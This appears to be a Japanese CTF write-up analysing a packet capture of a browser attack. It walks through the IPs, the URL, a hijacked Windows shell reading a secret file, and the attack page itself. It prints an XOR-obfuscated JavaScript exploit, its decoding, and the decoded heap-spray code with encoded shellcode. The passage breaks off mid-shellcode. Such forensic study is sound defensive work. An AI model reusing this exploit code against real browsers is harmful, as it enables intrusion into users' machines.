OWASP AppSec USA 2011 CTF Pre-conference Challenge #1 - May 2011

OWASP AppSecUSA 2011 のCTFのPre-conference Challenge #1の問題についてです。
問題のパケットファイル

To try this challenge on your own, download the packet capture, study it, and try to answer the following questions:
Which IP addresses were involved?
What URL(s) was (were) requested?
What exploit was used?
What information was taken?

パケット解析の問題で、IP, URL, 使われた脆弱性, 何の情報が取られた。を見つける問題です。
wiresharkで見るだけで、IP, URL何の情報が取られたか分かります。
ざっくりパケットを眺めた感じだと、ブラウザがサーバにアクセスして、脆弱性をついた攻撃を行い、シェルを奪っているといった流れだと思います。
パケットの中に登場するIPアドレス

  • 192.168.1.50(windowsクライアント)
  • 192.168.1.5(ウェブサーバ)

クライアントが送信したHTTPリクエストラインは

GET /zezevAs9up49EdRema/ HTTP/1.1

なので、URLは

その後、httpのやりとりがあって、後半のパケットのTCPストリームを見ると、

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>cd c:\windows\temp\

C:\WINDOWS\Temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 4C5C-C58A

 Directory of C:\WINDOWS\Temp

04/27/2011  11:26 PM              .
04/27/2011  11:26 PM              ..
03/06/2011  11:55 PM            16,384 Perflib_Perfdata_49c.dat
04/27/2011  05:37 PM            16,384 Perflib_Perfdata_5f0.dat
04/27/2011  05:37 PM            16,384 Perflib_Perfdata_668.dat
03/07/2011  12:07 AM            16,384 Perflib_Perfdata_66c.dat
03/07/2011  12:03 AM            16,384 Perflib_Perfdata_6ac.dat
04/27/2011  11:26 PM            27,722 T0ps3(r3t.txt
               6 File(s)        109,642 bytes
               2 Dir(s)   2,654,466,048 bytes free

C:\WINDOWS\Temp>type T0ps3(r3t.txt
z@.......P..,NK...KF............8D.;
(略)

ということで、取られた情報は、

T0ps3(r3t.txt (Topsecret.txt) ですが、中身は暗号化されているようでそのままでは何のデータか分からないみたいです。
さて、攻撃に利用された脆弱性を調べるために、HTTPのやりとりを追っていきます。
クライアントが要求したリクエストに対して、サーバは

HTTP/1.1 302 Moved
Location: /zezevAs9up49EdRema/?BsUwDJHBAyEvtyJToa
...

302 Moved なので一時的な移動としてクライアントは解釈し以下のリクエストを発行します。

GET /zezevAs9up49EdRema/?BsUwDJHBAyEvtyJToa HTTP/1.1
...
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 11937
Pragma: no-cache
Server: Apache
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
  var zR = '3412275701301a0b320f3f26111a0b21031b0e111739301c3c240a2a133e15332b1e3e33352a1c11362b0d13093d03201b0f3b13012f3b5368576609070f0c3c0b2256423c351d410c21070d11082b2832090e390e3b041f012e252b2f062c291b04102b1c37002d29162a2a16003f271219050f140f312f0d121e302d260a1702316477682c240e6537060b2b2d474879153a05646221627c59754d54106a684f507143654c6423636968020b2426031f160c0b31031e383e0806092f36222e0e0822373c2713210c36301e2b00043211051e291c07222c1705212e3d211c26033e0d12233f113d32417f533118273f25272f0d6b15061c2b200a242e1638122a3e60073b2b0c0502031a310c20371f2f3b26080636170d233d272f02352500082207001d032e30203c143e303f1c3b1910051d1b0e6d7106101303103417133924242e38311b3c2a052f1a3b082d15273f1b0636203627363501011c312b29132539341f221b383b180113060d0026163f1e1f29572e351b00624e75550f0c04607a04331706593a250211061c3135062612270f09360c1d1528352638301f10322c002630060d062327203b1b280313151e071e0c293717031507272b080027332d1e0725211f020c0e3a011b0e17021c1c14310612016477682c3415294d0218387419280021271b3d3a1f3b2f3611262e112d0c1e241529100f353b042c38310b053b311b320b3923023f1b3d280631123c2831252b331d2d351827754a64242d35613837041500627d54172301753e1519061a0f1d1d27333632301f3437373a06341c01260f0b021b1934322637252337331d2d13121134121237050c18011622213f2c2e12201d253b1c3715203025062419243f3d00340b090b0a3c30131c113d11252f2d0a231c647768372f1c361515092f6f09142c10211e2b24680b2d152b3c303a0c18372e383e020728280c37250a15273e3f1a3d3c162c030627281f20050d0a212c1c2e19251b11331620340b2f110706516c0d021838742a34103a754a640319110f210b122c280d1b1705322620332b3b3814081d0b043314271917131a3734332220211b1b2a301d23383b213d343b30363b3d131e28141e3f13061a1e1d0033090b333b2c3d380300300e33011c223c1824083d3a0e32216062665c304f44402c711a587a433652317b7d75255c3042111b72711a5574443052317e7976785c30464c4a2c711a5871156052317b7c20275c3010104879711a5775476752317d7976765c3045104d7a711a56714a375231287d71225c304f454078711a567a41335231787c75755c3045401b7e711a5921476d52317b2c26775c3046411b7a711a0472416552317d2a75245c3045154e72711a0274153052312f7921705c3012404a78711a5672116352317c7f75785c301415412e711a03764a6552312c2b74235c304e404d2c711a537a17635231737e24785c3046174e7d711a567340625231737b71755c3044434d7c711a5324126c52317d7b20735c3046404e2c711a5226446752312c2c73205c30174c1b7a711a597a4a6d52317b7d24745c3013474b78711a597447375231782c24795c304042407b711a5575116252317d2b76795c3047404a7f711a5073443152312f2a24765c304440492e711a0470436452317e7871275c3042114e7e711a037b11645231792b76785c3042454d2b711a56234a6252312c7e73795c304f461d7f711a0377113752317b2c7b235c304641402c711a0324476652317d7e20725c3041414b7f711a587b42365231287020245c3044174d78711a5624446352317d2976705c301447482e711a5321446252317e7176795c3041104e7f711a5673446752317d7b76235c3047164b7d711a5620156052317a7a76245c3045411c7b711a0472426c52317b7d76715c3041404072711a527545625231737120245c30414c4e7a711a512647345231787c76765c3014414028711a597247635231782c26745c304f424829711a597b4a6652312f7a26735c3013474b7b711a537744365231287020735c304f124d2c711a5070116452317a2b27235c304f461872711a5977116252317d2d26775c3047404a29711a5276113352312e797a705c3014151f73711a557043615231782e20235c304f431873711a5926116152317c7e7b705c30144d497f711a057641345231797071275c3015441f2c711a0374153652312c2c70235c3045444e73711a0372156d5231737876725c30414c4e7e711a562344365231287071255c304f4c1873711a0375116552312f7971785c3012414979711a0574416c52317e7a7b725c304f421b78711a032740615231782e75705c3041464e2e711a5872433652317e7171765c3044174e73711a04204b6652312c7d73715c3044431b7f711a0471436c52317a7d75765c304e174d79711a0721176552317b7d71745c304f46412e711a557a47375231787120705c3045121c7a711a587b456352317b7c76705c3014474b7e711a5873116c5231737f20205c3041164028711a5270446052312e7c24775c304f124d7d711a077b426c5231797920235c3014421f72711a007a416052317d7b75245c3042114829711a562444635231782c72255c3041444d7c711a072640345231282e76715c3045101b7e711a5221423152312f7a7a795c3046404f7d711a5523473352317d7a76715c304147487f711a552444635231287c7b735c304e43407c711a5073176352317e7927735c3041404e7d711a527741365231282920275c3045474a2c711a5177153152312c7170705c304110497e711a5627476c52317b2b75715c3040431b2f711a037b11625231297972705c3015441a7d711a5375166552312c7d71235c3041154a29711a567347665231732a76795c3042114e7f711a5126406152312f7970735c3042154d28711a58734a3352312e7d70235c3042434e73711a072142345231287876735c304e104b2c711a0471406d52317d2b73255c3040424e72711a037041605231737f20745c3044104079711a03204a6c52312b7073755c30104c4b7a711a51214437523172717b715c3013161f7d711a0576456c5231287b70755c3045104e2c711a5275116d52317d7e75245c30414c4e7d711a0374476352312b717b795c30144c1b7b711a562611305231732e76735c3014124d72711a56724a3752317a2c75785c301345417c711a5375446052317b7c70755c3046411b79711a5775476452317e7175205c3014151b7c711a5123473352317c7e24225c304f474a29711a0372116c52317e787a255c304e45407c711a057717655231737870255c304f4c1b7b711a5873126c52312e7a74235c3047101c78711a587040625231737f72755c3046474e29711a0472176452317e7b76765c3014401b78711a0576426652312c7073235c3014434073711a5170126d52317a2b27725c30454d4e79711a5120153152317e2a24745c304e411b7f711a5226163752317b2b75235c3041454e2c711a5276446152312e7e70725c304e444a2c711a5670156c5231727b70275c3044171c79711a5621113752317d7b76245c3013164a7a711a5624416052317d7e76775c304145487f711a5677473452317d7c71745c304e404a2c711a0473156052312f7a73795c3013444b72711a567540365231737b76205c3041161b72711a032442605231782b75785c3042444e7a711a5126116152317d2976235c304f444b7d711a552711345231737120765c3044104e78711a5324443152317a7074765c304e101f73711a072611645231792c23795c3047404e2f711a582043605231737020235c3042474d2c711a5072446d52317a7c24795c3047174a7e711a0577423152317e7f70745c301447402c711a5275116352317e717b705c30424c4d7b711a557045635231287872225c3014414078711a0327116c5231737e23785c3010174878711a057111675231797d26775c3012404b2b711a55744161523128707b765c3040414172711a007010675231297b26785c3041401d73711a077641615231797b77245c3014451a73711a5273473752317b7a76775c3015424179711a5171436152317c2a21245c3043434b7a711a0375473352317c2924715c3015431b7a711a577043605231797021765c3041471f7c711a0373116252317e7a73725c3017421c7f711a0775466552312b2b71785c3010404a7f711a047211675231722e23255c3044171b7c711a527a106452317a2a75225c30144d1c29711a5871116452317d2923735c3040121d7a711a0027116c52317f7971735c3017474e78711a5874406652317e2b74275c3042124f7b711a0724153752312f7c7b745c3015471b73711a53234a6152317d2b20775c3042121c2f711a517a436c52317f7976755c3017454c2b711a507b17665231297176735c30144d1b28711a502744665231727e26795c3044164a2b711a5621413452312c2c20255c3041104f79711a02734b3352317e7870275c3015174a2c711a597641305231782e24795c3010114d7f711a057015345231297d77255c30464c417b711a057a166d52312e2970735c30454d4d2b711a512417675231292972225c3013401d72711a5876463752312c2a24225c3017114172711a5672156c52317c7970275c3015474172711a007743375231737826715c3010174a78711a5675113652317b2d76235c3044434872711a5476166c5231792b7a235c3045424128711a077310615231297023705c304f11487e711a0320116752317a7970775c3043404f72711a0223433752312b7b20775c3013454f29711a5220433052317a297b725c3047414f2f711a5427466552317a2c71245c3012124e7b711a0226176052317a2975245c304f114e73711a0477176552317e2d71785c304341407b711a597617645231727173245c3017421a7b711a0070156152317f2b74235c304617402c711a5424106652312f7d77205c304044487b711a007b44605231727e7b225c304245482c711a5073106d52312c707a795c30134d4c7b711a5176416c5231737f76225c304e114f2b711a5775456752317c7f70755c304116492c711a597517645231787977205c304f434e7e711a5521446452317a2c75785c3015434e2e711a037b41305231792d75275c3040424872711a50774b6552312b2e73735c301242487e711a0572473152312e7e24795c304e42412e711a05744a6752317d2d27745c304e401a7c711a597342655231287026725c3047404172711a047a17375231282d75255c3047421b79711a597a463752312f7073225c30464c412f711a522445645231722d24765c3045414079711a54714237506d713e2333590a1e360e322c290324052011250f2b3b3623163d190e3c171b28202003212b0020151403271d17142d04080c0711053e05232a1129110656495903053c2f1a3d312f150d073a2509100330163b243928263d27302927053a33210117301f203d363b11063e20053b3d101400061538001302053425093005271e012d13323d1038113d242e200b3810022122203504330b190d0f217c4f436751755c64683d6061526554445b6a7f4f432151755c6468786061526554105b6a7f4f43670677576f6a6a7263596e56561a68744441604377576f6a6a2663596c4d10166a2f4f2e2a31220f3c0c2a24370c2317311a33233532091e2201073e0120122f13193e111d01150329103810142d250723290c371d1b193c0722625868570b220a3539010314120f3f320e24210a222d17012535373a313f162a1c02002b2a24000d26212b2f2629221b311b1a1d2e0820203d1f076a356236112c1a11516a1b0723350b2d31262c3e37271800150d0e1007240c350516030d281b1417160f1e232c303604022f140510290f2a1208382c1427112217410d271d32032c6a74627101214644497a74465a241c27576c3b2701081311131d3f0c3a1e390f032107030404062a32110f2d2e0c2008142807754a647a73623016063f1e2d2f3d29272c020d3a343e38050f35011d3f2d330d38273614201d306a7462704c754d54082517260b16163c310224391a0c09310633370610042a160a0c20023e2f372b0d6e5d5d593c1d2d33301f2c071333260d15291f1e13213b11383b070b24060824310a0f0a0a3e251f2e0c0e10281f2c150a391b072c3e14240d300800353519023a340d201c27283f0318052107241b11053d19332f011c3b182e0302130c202032417f531a1f063d303a071b2300011f2b110c183529063c293d3e0135302725222f251e07361709371c27272f122614001424300b3d0d322a1b16576f6a0d1713307e0b120c24371b082d1d753a05010b312937285e2c2a183c36070f0517110228302e05103c1c36383a1f04292803031f163b2e380a3a153d3737027d14282e1f3b3d00090e0e19363f3b230926362b14260005260e0c182b120e2b062729260107260e00312d2c1d1b3335093413013a05313624055b7c4c343b25320516213436151031211131093c1b262b011b331500331c33242628150126062e35050f20101f0e062e3f2b21391b12020625061e00102e141724112c001a2022061e2f190c023b37320c020054446a300002371e301930642b3024183113310f2f3a1b2e201930143062101113111c10390f083229033a1f111e3d200a0331322e3e1e091c3c3d1024091e3414010b0c09507e121b1a3f390a0f365d3212300f24272c1c2b023600033047430b3f241f171c11011529303b2c003f1d04390c39120317231204240d1d141501333e3e0c163837152e1a223a1728292e2401061a3b0e35241e0731023f0f02293539053a03243c2b3321313a2a3a0d0f2e2e362c1c372b240a342f302701093a242f63506b1f1a172f2627350f3f754a64686a7936102b121b0e64270a150b1d2112363c292e69152e2f2d38393e200610252f1314332938393206150d290c07434177437c4c392c3d2c220d2c191a59263f363803003f3823181e3825293c170e0101170c181235065f6d3138627c59672a01492964093d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d72224921544f1f25264f492b5368577471682b61456538262b30012d022800253c0b300a0c0a170a112c033b3c0c320422072e053e1c21033c0e2207131a023c2c0f2623031d332316253b023e102e0c7a03042c14211f7f6a21696a503e38262b30012d022800253c0b300a0c0a170a112c033b3c0c320422072e053e1c21033c0e2207131a023c2c0f2623031d332316253b023e102e0c0f063c6c173403256a756231423800150b6a204f5c6203241a340e2726033b292c11373a2715082e11343e1d38240704110f18063e3e173a321b021a30261b2e0931230317012f30041e321031013f16252510131c103c3a360910021b2c3b1d0431393d0537573604173c263102042c076e0a';
  var fkOAvrfnGj = '';
  for (i = 0;i<zR.length;i+=2) {
   fkOAvrfnGj += String.fromCharCode(parseInt(zR.substring(i, i+2), 16));
  }
  var wDiQinaybhMQlGHucykGQcaeXX = location.search.substring(1);
  var ObxeUkIyK = '';
  for (i=0;i<fkOAvrfnGj.length;i++) {
   ObxeUkIyK += String.fromCharCode(fkOAvrfnGj.charCodeAt(i) ^ wDiQinaybhMQlGHucykGQcaeXX.charCodeAt(i%wDiQinaybhMQlGHucykGQcaeXX.length));
  }
  window["eZRSOvZRSOaZRSOl".replace(/[A-Z]/g,"")](ObxeUkIyK);

</script>
</head>
<body>
<span id="ILqhSVYCTPuMXyuIkXNJGtSiZFetXbaxyjQmTKbbjPjxVQlXPxLNTowWKpuHwMCPpOqCIpSJqRdMnpEMoWsZhNapeUmCrvMplm"><iframe src="/zezevAs9up49EdRema/cOAOxcSWijvvy.gif" onload="MAKCshNm(event)" /></span></body></html>
</body>
</html>

この中のjavascriptを見ていきます。
変数名が長くてコードを読みにくいので、適当にそれっぽい名前をつけてみます。

// 16進数が書かれた文字列
var zR = '3412275701301a0b320f3f26111a0b21031b0e111739301c3c240a2a133e15332b1e3e33352a1c11362b0d13093d03201b0f3b13012f3b5368576609070f0c3c0b2256423c351d410c21070d11082b2832090e390e3b041f012e252b2f062c291b04102b1c37002d29162a2a16003f271219050f140f312f0d121e302d260a1702316477682c240e6537060b2b2d474879153a05646221627c59754d54106a684f507143654c6423636968020b2426031f160c0b31031e383e0806092f36222e0e0822373c2713210c36301e2b00043211051e291c07222c1705212e3d211c26033e0d12233f113d32417f533118273f25272f0d6b15061c2b200a242e1638122a3e60073b2b0c0502031a310c20371f2f3b26080636170d233d272f02352500082207001d032e30203c143e303f1c3b1910051d1b0e6d7106101303103417133924242e38311b3c2a052f1a3b082d15273f1b0636203627363501011c312b29132539341f221b383b180113060d0026163f1e1f29572e351b00624e75550f0c04607a04331706593a250211061c3135062612270f09360c1d1528352638301f10322c002630060d062327203b1b280313151e071e0c293717031507272b080027332d1e0725211f020c0e3a011b0e17021c1c14310612016477682c3415294d0218387419280021271b3d3a1f3b2f3611262e112d0c1e241529100f353b042c38310b053b311b320b3923023f1b3d280631123c2831252b331d2d351827754a64242d35613837041500627d54172301753e1519061a0f1d1d27333632301f3437373a06341c01260f0b021b1934322637252337331d2d13121134121237050c18011622213f2c2e12201d253b1c3715203025062419243f3d00340b090b0a3c30131c113d11252f2d0a231c647768372f1c361515092f6f09142c10211e2b24680b2d152b3c303a0c18372e383e020728280c37250a15273e3f1a3d3c162c030627281f20050d0a212c1c2e19251b11331620340b2f110706516c0d021838742a34103a754a640319110f210b122c280d1b1705322620332b3b3814081d0b043314271917131a3734332220211b1b2a301d23383b213d343b30363b3d131e28141e3f13061a1e1d0033090b333b2c3d380300300e33011c223c1824083d3a0e32216062665c304f44402c711a587a433652317b7d75255c3042111b72711a5574443052317e7976785c30464c4a2c711a5871156052317b7c20275c3010104879711a5775476752317d7976765c3045104d7a711a56714a375231287d71225c304f454078711a567a41335231787c75755c3045401b7e711a5921476d52317b2c26775c3046411b7a711a0472416552317d2a75245c3045154e72711a0274153052312f7921705c3012404a78711a5672116352317c7f75785c301415412e711a03764a6552312c2b74235c304e404d2c711a537a17635231737e24785c3046174e7d711a567340625231737b71755c3044434d7c711a5324126c52317d7b20735c3046404e2c711a5226446752312c2c73205c30174c1b7a711a597a4a6d52317b7d24745c3013474b78711a597447375231782c24795c304042407b711a5575116252317d2b76795c3047404a7f711a5073443152312f2a24765c304440492e711a0470436452317e7871275c3042114e7e711a037b11645231792b76785c3042454d2b711a56234a6252312c7e73795c304f461d7f711a0377113752317b2c7b235c304641402c711a0324476652317d7e20725c3041414b7f711a587b42365231287020245c3044174d78711a5624446352317d2976705c301447482e711a5321446252317e7176795c3041104e7f711a5673446752317d7b76235c3047164b7d711a5620156052317a7a76245c3045411c7b711a0472426c52317b7d76715c3041404072711a527545625231737120245c30414c4e7a711a512647345231787c76765c3014414028711a597247635231782c26745c304f424829711a597b4a6652312f7a26735c3013474b7b711a537744365231287020735c304f124d2c711a5070116452317a2b27235c304f461872711a5977116252317d2d26775c3047404a29711a5276113352312e797a705c3014151f73711a557043615231782e20235c304f431873711a5926116152317c7e7b705c30144d497f711a057641345231797071275c3015441f2c711a0374153652312c2c70235c3045444e73711a0372156d5231737876725c30414c4e7e711a562344365231287071255c304f4c1873711a0375116552312f7971785c3012414979711a0574416c52317e7a7b725c304f421b78711a032740615231782e75705c3041464e2e711a5872433652317e7171765c3044174e73711a04204b6652312c7d73715c3044431b7f711a0471436c52317a7d75765c304e174d79711a0721176552317b7d71745c304f46412e711a557a47375231787120705c3045121c7a711a587b456352317b7c76705c3014474b7e711a5873116c5231737f20205c3041164028711a5270446052312e7c24775c304f124d7d711a077b426c5231797920235c3014421f72711a007a416052317d7b75245c3042114829711a562444635231782c72255c3041444d7c711a072640345231282e76715c3045101b7e711a5221423152312f7a7a795c3046404f7d711a5523473352317d7a76715c304147487f711a552444635231287c7b735c304e43407c711a5073176352317e7927735c3041404e7d711a527741365231282920275c3045474a2c711a5177153152312c7170705c304110497e711a5627476c52317b2b75715c3040431b2f711a037b11625231297972705c3015441a7d711a5375166552312c7d71235c3041154a29711a567347665231732a76795c3042114e7f711a5126406152312f7970735c3042154d28711a58734a3352312e7d70235c3042434e73711a072142345231287876735c304e104b2c711a0471406d52317d2b73255c3040424e72711a037041605231737f20745c3044104079711a03204a6c52312b7073755c30104c4b7a711a51214437523172717b715c3013161f7d711a0576456c5231287b70755c3045104e2c711a5275116d52317d7e75245c30414c4e7d711a0374476352312b717b795c30144c1b7b711a562611305231732e76735c3014124d72711a56724a3752317a2c75785c301345417c711a5375446052317b7c70755c3046411b79711a5775476452317e7175205c3014151b7c711a5123473352317c7e24225c304f474a29711a0372116c52317e787a255c304e45407c711a057717655231737870255c304f4c1b7b711a5873126c52312e7a74235c3047101c78711a587040625231737f72755c3046474e29711a0472176452317e7b76765c3014401b78711a0576426652312c7073235c3014434073711a5170126d52317a2b27725c30454d4e79711a5120153152317e2a24745c304e411b7f711a5226163752317b2b75235c3041454e2c711a5276446152312e7e70725c304e444a2c711a5670156c5231727b70275c3044171c79711a5621113752317d7b76245c3013164a7a711a5624416052317d7e76775c304145487f711a5677473452317d7c71745c304e404a2c711a0473156052312f7a73795c3013444b72711a567540365231737b76205c3041161b72711a032442605231782b75785c3042444e7a711a5126116152317d2976235c304f444b7d711a552711345231737120765c3044104e78711a5324443152317a7074765c304e101f73711a072611645231792c23795c3047404e2f711a582043605231737020235c3042474d2c711a5072446d52317a7c24795c3047174a7e711a0577423152317e7f70745c301447402c711a5275116352317e717b705c30424c4d7b711a557045635231287872225c3014414078711a0327116c5231737e23785c3010174878711a057111675231797d26775c3012404b2b711a55744161523128707b765c3040414172711a007010675231297b26785c3041401d73711a077641615231797b77245c3014451a73711a5273473752317b7a76775c3015424179711a5171436152317c2a21245c3043434b7a711a0375473352317c2924715c3015431b7a711a577043605231797021765c3041471f7c711a0373116252317e7a73725c3017421c7f711a0775466552312b2b71785c3010404a7f711a047211675231722e23255c3044171b7c711a527a106452317a2a75225c30144d1c29711a5871116452317d2923735c3040121d7a711a0027116c52317f7971735c3017474e78711a5874406652317e2b74275c3042124f7b711a0724153752312f7c7b745c3015471b73711a53234a6152317d2b20775c3042121c2f711a517a436c52317f7976755c3017454c2b711a507b17665231297176735c30144d1b28711a502744665231727e26795c3044164a2b711a5621413452312c2c20255c3041104f79711a02734b3352317e7870275c3015174a2c711a597641305231782e24795c3010114d7f711a057015345231297d77255c30464c417b711a057a166d52312e2970735c30454d4d2b711a512417675231292972225c3013401d72711a5876463752312c2a24225c3017114172711a5672156c52317c7970275c3015474172711a007743375231737826715c3010174a78711a5675113652317b2d76235c3044434872711a5476166c5231792b7a235c3045424128711a077310615231297023705c304f11487e711a0320116752317a7970775c3043404f72711a0223433752312b7b20775c3013454f29711a5220433052317a297b725c3047414f2f711a5427466552317a2c71245c3012124e7b711a0226176052317a2975245c304f114e73711a0477176552317e2d71785c304341407b711a597617645231727173245c3017421a7b711a0070156152317f2b74235c304617402c711a5424106652312f7d77205c304044487b711a007b44605231727e7b225c304245482c711a5073106d52312c707a795c30134d4c7b711a5176416c5231737f76225c304e114f2b711a5775456752317c7f70755c304116492c711a597517645231787977205c304f434e7e711a5521446452317a2c75785c3015434e2e711a037b41305231792d75275c3040424872711a50774b6552312b2e73735c301242487e711a0572473152312e7e24795c304e42412e711a05744a6752317d2d27745c304e401a7c711a597342655231287026725c3047404172711a047a17375231282d75255c3047421b79711a597a463752312f7073225c30464c412f711a522445645231722d24765c3045414079711a54714237506d713e2333590a1e360e322c290324052011250f2b3b3623163d190e3c171b28202003212b0020151403271d17142d04080c0711053e05232a1129110656495903053c2f1a3d312f150d073a2509100330163b243928263d27302927053a33210117301f203d363b11063e20053b3d101400061538001302053425093005271e012d13323d1038113d242e200b3810022122203504330b190d0f217c4f436751755c64683d6061526554445b6a7f4f432151755c6468786061526554105b6a7f4f43670677576f6a6a7263596e56561a68744441604377576f6a6a2663596c4d10166a2f4f2e2a31220f3c0c2a24370c2317311a33233532091e2201073e0120122f13193e111d01150329103810142d250723290c371d1b193c0722625868570b220a3539010314120f3f320e24210a222d17012535373a313f162a1c02002b2a24000d26212b2f2629221b311b1a1d2e0820203d1f076a356236112c1a11516a1b0723350b2d31262c3e37271800150d0e1007240c350516030d281b1417160f1e232c303604022f140510290f2a1208382c1427112217410d271d32032c6a74627101214644497a74465a241c27576c3b2701081311131d3f0c3a1e390f032107030404062a32110f2d2e0c2008142807754a647a73623016063f1e2d2f3d29272c020d3a343e38050f35011d3f2d330d38273614201d306a7462704c754d54082517260b16163c310224391a0c09310633370610042a160a0c20023e2f372b0d6e5d5d593c1d2d33301f2c071333260d15291f1e13213b11383b070b24060824310a0f0a0a3e251f2e0c0e10281f2c150a391b072c3e14240d300800353519023a340d201c27283f0318052107241b11053d19332f011c3b182e0302130c202032417f531a1f063d303a071b2300011f2b110c183529063c293d3e0135302725222f251e07361709371c27272f122614001424300b3d0d322a1b16576f6a0d1713307e0b120c24371b082d1d753a05010b312937285e2c2a183c36070f0517110228302e05103c1c36383a1f04292803031f163b2e380a3a153d3737027d14282e1f3b3d00090e0e19363f3b230926362b14260005260e0c182b120e2b062729260107260e00312d2c1d1b3335093413013a05313624055b7c4c343b25320516213436151031211131093c1b262b011b331500331c33242628150126062e35050f20101f0e062e3f2b21391b12020625061e00102e141724112c001a2022061e2f190c023b37320c020054446a300002371e301930642b3024183113310f2f3a1b2e201930143062101113111c10390f083229033a1f111e3d200a0331322e3e1e091c3c3d1024091e3414010b0c09507e121b1a3f390a0f365d3212300f24272c1c2b023600033047430b3f241f171c11011529303b2c003f1d04390c39120317231204240d1d141501333e3e0c163837152e1a223a1728292e2401061a3b0e35241e0731023f0f02293539053a03243c2b3321313a2a3a0d0f2e2e362c1c372b240a342f302701093a242f63506b1f1a172f2627350f3f754a64686a7936102b121b0e64270a150b1d2112363c292e69152e2f2d38393e200610252f1314332938393206150d290c07434177437c4c392c3d2c220d2c191a59263f363803003f3823181e3825293c170e0101170c181235065f6d3138627c59672a01492964093d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d722249212a014929640b3d3743364720163d72224921544f1f25264f492b5368577471682b61456538262b30012d022800253c0b300a0c0a170a112c033b3c0c320422072e053e1c21033c0e2207131a023c2c0f2623031d332316253b023e102e0c7a03042c14211f7f6a21696a503e38262b30012d022800253c0b300a0c0a170a112c033b3c0c320422072e053e1c21033c0e2207131a023c2c0f2623031d332316253b023e102e0c0f063c6c173403256a756231423800150b6a204f5c6203241a340e2726033b292c11373a2715082e11343e1d38240704110f18063e3e173a321b021a30261b2e0931230317012f30041e321031013f16252510131c103c3a360910021b2c3b1d0431393d0537573604173c263102042c076e0a';
var xorEncrypted = '';

for ( i = 0 ; i < zR.length ; i += 2 ) {
  xorEncrypted += String.fromCharCode( parseInt( zR.substring( i, i+2 ), 16 ) ); // 16進数が書かれた文字列をバイナリに変換
}

var locate = 'BsUwDJHBAyEvtyJToa'     // = location.search.substring(1);
var exploitcode = '';

for ( i = 0 ; i < locate.length ; i++ ) {
  // バイナリとlocateの文字列をXORで復号している
  exploitcode += String.fromCharCode( xorEncrypted.charCodeAt(i) ^ locate.charCodeAt( i % locate.length ) );
}

window["eZRSOvZRSOaZRSOl".replace(/[A-Z]/g,"")](exploitcode); // window["eval"](exploit);

大体の流れが掴めたので、Firebugあたりのデバッガを使って、最後にevalで実行されるexploitcodeに入っている文字列を見てみます。

var EzRIsvzPecAulzLbBNtVtfKSVHaJaJQRwYIfraEQHDFVovqGnNy = "COMMENT";var NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF = new Array();for (i = 0; i < 1300; i++){NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF[i] = document.createElement(EzRIsvzPecAulzLbBNtVtfKSVHaJaJQRwYIfraEQHDFVovqGnNy);NRRzUBcjspKOzBNKnOgXzqhcSFQRYAtTcBEKTsjPVSMMUvtYykTdBGHdWF[i].data = "KFL";}var pqmpDodBBlZeNpszilbaIYrlEEhJnrGtCUSYqOGbQfKpZFauVzPqSRBTHRomRReUJNOCDmznHHsusuGv = null;var vIBRrlypWynOTPZhgXqEWZExqqLnyHNsOHQfdXaqjlybNsSEmGQRyIBTZT = new Array();var IQSNXNdXQGOxdpUuDoqpVIdNrGmmMxrXDaDfjiYZSukWAquRUyCcLyYVjUgzercTIoRKxfLhwpAAIKEuehhwEJNoyvk = unescape;function IllnJDCFLXOzMWplbDudsPQJFPiSwnpSPlUhGLsdZhWSqtpqeuCOeYEG(){var EURI = IQSNXNdXQGOxdpUuDoqpVIdNrGmmMxrXDaDfjiYZSukWAquRUyCcLyYVjUgzercTIoRKxfLhwpAAIKEuehhwEJNoyvk( '%u909f%u980c%u157d%u4eb8%u467e%u4149%u083f%u93f5%u14bf%ufd13%u6742%u7147%u3d40%u739b%ub53c%u9192%u782f%u2474%u34b4%u8c48%u1dd6%u05b0%ue020%u7b7e%u3a78%uc6fe%ue1c1%ud432%u70b6%u6779%uba8d%ub490%ufc6b%u844f%u28d6%u96f9%u0c77%u7137%u9334%u2746%u2fa9%u73b2%u047f%u3d72%ufd1a%ua8b0%u8898%u15f5%ue322%u864b%u2df8%u6691%u47b7%u7c48%u1435%u117d%uebf7%u240d%ue201%u403f%u4e74%ub9b1%u3c49%u414a%u7a97%uf618%u92d5%ub5bb%u1d9b%u059f%ubf43%u76b3%u7525%u991c%ub8be%u2c42%u7f76%u7a41%ub31d%u2c77%u4948%u7d75%u7172%u734b%u1b27%u7bf5%u024e%u35e1%ue019%u1540%u7498%u3767%u99be%u7870%u0d4a%u2447%ub59b%u8046%u2dd5%u961c%u8993%ue2d2%ue321%u257c%ub8b2%u9f4f%u12b1%u0ceb%u92a8%u85b7%u7ed6%u143c%u34bf%ud181%ubaf9%u4204%u2fbb%u97a9%u8db4%u6691%ub905%ud42a%u383f%uc0ff%ub6fc%ufd2b%u3079%ub0f8%u9043%u7874%u7a7c%ub83d%u98a9%ub7b0%ue139%ud503%ud629%u4293%u96b2%ube34%u2f71%u727d%u900c%u4937%u2c79%ueb83%uf510%u27b5%ue309%u0577%u8c43%ufcd0%u1535%u928d%u484b%u29b1%u3fe0%u9966%u1441%ub324%u91b9%u97ba%u7b9b%u3275%ud4f6%u9f47%uf919%u31bb%ub6f8%ua825%u737e%u4e1c%u7f76%u2d0d%u7046%ufd3a%ubf40%u3db4%u3c1d%ue288%u0467%u4a4f%u7240%